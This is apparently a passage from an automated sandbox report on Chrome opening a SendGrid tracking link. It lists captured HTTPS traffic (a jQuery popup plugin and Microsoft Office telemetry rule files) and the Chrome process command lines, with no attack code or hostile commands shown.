                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:24 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:24 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 13 Mar 2018 12:53:50 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 21185
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:24 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:24 UTC7876INData Raw: 2f 2a 21 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 20 76 31 2e 30 2e 31 20 7c 20 68 74 74 70 3a 2f 2f 64 69 6d 73 65 6d 65 6e 6f 76 2e 63 6f 6d 2f 70 6c 75 67 69 6e 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2f 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 61 29 3a 61 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 3a 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 7c 7c 77 69 6e 64 6f 77 2e 5a 65 70 74 6f 29 7d 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 3d 22
                                                                                                                                          Data Ascii: /*! Magnific Popup v1.0.1 | http://dimsemenov.com/plugins/magnific-popup/ */!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(a){var b,c,d,e,f,g,h="
                                                                                                                                          2024-11-28 10:33:24 UTC8000INData Raw: 68 69 73 2e 62 67 4f 76 65 72 6c 61 79 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 61 29 2c 62 2e 77 72 61 70 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 61 29 7d 2c 5f 68 61 73 53 63 72 6f 6c 6c 42 61 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 28 62 2e 69 73 49 45 37 3f 64 2e 68 65 69 67 68 74 28 29 3a 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 29 3e 28 61 7c 7c 76 2e 68 65 69 67 68 74 28 29 29 7d 2c 5f 73 65 74 46 6f 63 75 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 28 62 2e 73 74 2e 66 6f 63 75 73 3f 62 2e 63 6f 6e 74 65 6e 74 2e 66 69 6e 64 28 62 2e 73 74 2e 66 6f 63 75 73 29 2e 65 71 28 30 29 3a 62 2e 77 72 61 70 29 2e 66 6f 63 75 73 28 29 7d 2c 5f 6f 6e 46 6f 63 75 73 49 6e 3a 66 75 6e 63 74 69 6f 6e 28 63 29 7b
                                                                                                                                          Data Ascii: his.bgOverlay.removeClass(a),b.wrap.removeClass(a)},_hasScrollBar:function(a){return(b.isIE7?d.height():document.body.scrollHeight)>(a||v.height())},_setFocus:function(){(b.st.focus?b.content.find(b.st.focus).eq(0):b.wrap).focus()},_onFocusIn:function(c){
                                                                                                                                          2024-11-28 10:33:24 UTC5309INData Raw: 3d 63 3f 62 2e 63 75 72 72 49 74 65 6d 2e 69 6d 67 3a 62 2e 73 74 2e 7a 6f 6f 6d 2e 6f 70 65 6e 65 72 28 62 2e 63 75 72 72 49 74 65 6d 2e 65 6c 7c 7c 62 2e 63 75 72 72 49 74 65 6d 29 3b 76 61 72 20 65 3d 64 2e 6f 66 66 73 65 74 28 29 2c 66 3d 70 61 72 73 65 49 6e 74 28 64 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 74 6f 70 22 29 2c 31 30 29 2c 67 3d 70 61 72 73 65 49 6e 74 28 64 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 22 29 2c 31 30 29 3b 65 2e 74 6f 70 2d 3d 61 28 77 69 6e 64 6f 77 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2d 66 3b 76 61 72 20 68 3d 7b 77 69 64 74 68 3a 64 2e 77 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 28 75 3f 64 2e 69 6e 6e 65 72 48 65 69 67 68 74 28 29 3a 64 5b 30 5d 2e 6f 66 66 73 65 74 48 65 69 67 68 74 29 2d 67 2d
                                                                                                                                          Data Ascii: =c?b.currItem.img:b.st.zoom.opener(b.currItem.el||b.currItem);var e=d.offset(),f=parseInt(d.css("padding-top"),10),g=parseInt(d.css("padding-bottom"),10);e.top-=a(window).scrollTop()-f;var h={width:d.width(),height:(u?d.innerHeight():d[0].offsetHeight)-g-


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          143192.168.2.44990613.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:23 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:23 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 477
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                          ETag: "0x8DC582BA48B5BDD"
                                                                                                                                          x-ms-request-id: f73eacfc-701e-0001-0b91-3fb110000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103323Z-174f7845968jrjrxhC1EWRmmrs0000000yk0000000000e1p
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:23 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          144192.168.2.44990513.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:23 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:23 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 419
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                          ETag: "0x8DC582BB7F164C3"
                                                                                                                                          x-ms-request-id: dd02da03-701e-001e-0d91-3ff5e6000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103323Z-174f78459688l8rvhC1EWRtzr00000000b0g0000000005uy
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          145192.168.2.44990813.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:23 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:24 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 419
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                          ETag: "0x8DC582B9FF95F80"
                                                                                                                                          x-ms-request-id: 91facc7f-401e-0064-1f3e-4054af000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103324Z-174f7845968ljs8phC1EWRe6en0000000y1g000000009f03
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          146192.168.2.44990913.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:24 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:24 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 472
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                          ETag: "0x8DC582BB650C2EC"
                                                                                                                                          x-ms-request-id: fcd7fe31-301e-0033-0c91-3ffa9c000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103324Z-174f7845968nxc96hC1EWRspw80000000xy0000000009fmw
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:24 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          147192.168.2.44991013.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:24 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:24 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 468
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                          ETag: "0x8DC582BB3EAF226"
                                                                                                                                          x-ms-request-id: f8173c42-001e-0046-693b-40da4b000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103324Z-174f7845968zgtf6hC1EWRqd8s0000000r6g000000007e54
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:25 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          148192.168.2.44991213.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:25 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          149192.168.2.44991113.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:25 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net


                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:05:31:55
                                                                                                                                          Start date:28/11/2024
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:05:31:59
                                                                                                                                          Start date:28/11/2024
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2196,i,2262898026489481170,16591654043166447335,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:05:32:06
                                                                                                                                          Start date:28/11/2024
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D"
                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          No disassembly